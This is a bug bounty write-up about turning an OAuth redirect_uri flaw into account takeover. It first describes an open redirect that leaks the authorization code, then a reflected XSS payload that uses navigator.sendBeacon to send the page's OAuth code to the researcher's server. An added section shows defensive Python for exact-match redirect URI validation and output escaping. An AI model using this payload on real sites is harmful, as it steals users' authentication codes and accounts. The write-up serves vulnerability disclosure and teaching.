Never Give Up, The Story Behind a Dupe-To-Triaged

This is the story of how I got a dupe (within 24 hours!) and then found another (valid) vulnerability with the same impact.

The application used OAuth to authenticate. The authorization endpoint looked like the following (the host and some values are redacted):

[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

After seeing that, I quickly changed the redirect_uri parameter to point to my server, and I saw the application redirect me to it… so this is an Open Redirect vulnerability. Let's turn it into an Account Takeover!

In my PoC, I simply pointed the redirect_uri parameter at my server, and nothing else was needed, because the OAuth code is sent along with the redirect. So, that was easy. I wrote the report, sent it, and after 3 days I got the duplicate notification…

[Image: My submission (left), Dupe (right)]
Keep trying

I thought for a while about how to get an Account Takeover with a different technique. And then an idea popped into my head like an XSS alert popup ;-)

If I can exploit an XSS vulnerability in that endpoint, maybe I can steal the OAuth token, and that's it! I made the following PoC (again with the host and some values redacted):

[REDACTED]&redirect_uri=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

It worked!

But what makes the difference between a simple JavaScript popup and an ATO (Account Takeover)? A cool payload. So let's try to figure it out (thanks @mastersec!)

Final Payload:


Final URL (the beacon destination, my server, is redacted):

[REDACTED]&redirect_uri=aaa"><script>navigator.sendBeacon('',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]

And the result was the authentication token submitted to a server I control. WIN
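Both bugs in this write-up come from the same place: the authorization endpoint trusted whatever arrived in redirect_uri, first by redirecting to it (the open redirect that leaked the code) and then by reflecting it unescaped into the page (the XSS). The following is an added example, not code from the post or from the affected application, of how an authorization endpoint should treat that parameter: exact-match validation against the client's registered redirect URIs (RFC 6749 section 3.1.2 and the OAuth 2.0 Security BCP recommend exact string comparison), no redirect at all when the value does not match, and HTML-escaping of anything reflected into the error page. The client id, the registered URI, the code value and the query strings are constructed sample values.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed sample registration: the redirect URIs a client registered with
# the authorization server ahead of time. Hypothetical client id and URI.
REGISTERED_CLIENTS = {
    "example-client": {"https://app.example.com/oauth/callback"},
}


def redirect_uri_is_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact string match against the client's registered URIs.

    Exact matching (rather than prefix or host matching) rejects other hosts,
    look-alike hosts, extra path segments and values carrying injected markup.
    """
    return redirect_uri in REGISTERED_CLIENTS.get(client_id, set())


def handle_authorize(query_string: str) -> tuple[str, str]:
    """Simulate the decision the authorization endpoint has to make.

    Returns (status, payload). On a mismatch the server must not redirect to
    the supplied URI (RFC 6749 section 4.1.2.1); it renders an error page
    instead, and the reflected value is HTML-escaped (quotes included) so a
    value such as 'aaa"><script>...' shows up as inert text.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    client_id = params.get("client_id", [""])[0]
    redirect_uri = params.get("redirect_uri", [""])[0]
    state = params.get("state", [""])[0]

    if not redirect_uri_is_allowed(client_id, redirect_uri):
        body = (
            "<p>Invalid redirect_uri: "
            + html.escape(redirect_uri, quote=True)
            + "</p>"
        )
        return ("400", body)

    # Only a registered URI ever receives the authorization code. The code is a
    # constructed placeholder; the query is URL-encoded, never string-pasted.
    location = redirect_uri + "?" + urlencode({"code": "CONSTRUCTED_CODE", "state": state})
    return ("302", location)


if __name__ == "__main__":
    # Constructed requests: one legitimate, one open-redirect attempt,
    # one look-alike prefix, one with markup in the parameter.
    samples = [
        "client_id=example-client&redirect_uri=https%3A%2F%2Fapp.example.com%2Foauth%2Fcallback&response_type=code&state=xyz",
        "client_id=example-client&redirect_uri=https%3A%2F%2Fattacker.example%2F&response_type=code&state=xyz",
        "client_id=example-client&redirect_uri=https%3A%2F%2Fapp.example.com%2Foauth%2Fcallback.attacker.example&response_type=code",
        'client_id=example-client&redirect_uri=aaa"><script>x</script>&response_type=code',
    ]
    for q in samples:
        status, payload = handle_authorize(q)
        print(status, payload)
```

The important design choice is that the mismatch branch never redirects: an open redirect exists precisely when a server bounces the browser to an unvalidated URI, and escaping alone would have fixed only the XSS half of this story.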

I submitted the vulnerability and finally, after 2 days, it got triaged and I received the bounty $$$ :-)

So, always remember, KEEP TRYING!

I hope you enjoyed this write up. Happy Hacking-Hunting

Hope you liked the post! If you would like to contact me, please visit or write to

#BugBounty #BugBountyTips #Hacking

Information Security Consultant, Researcher & Illusionist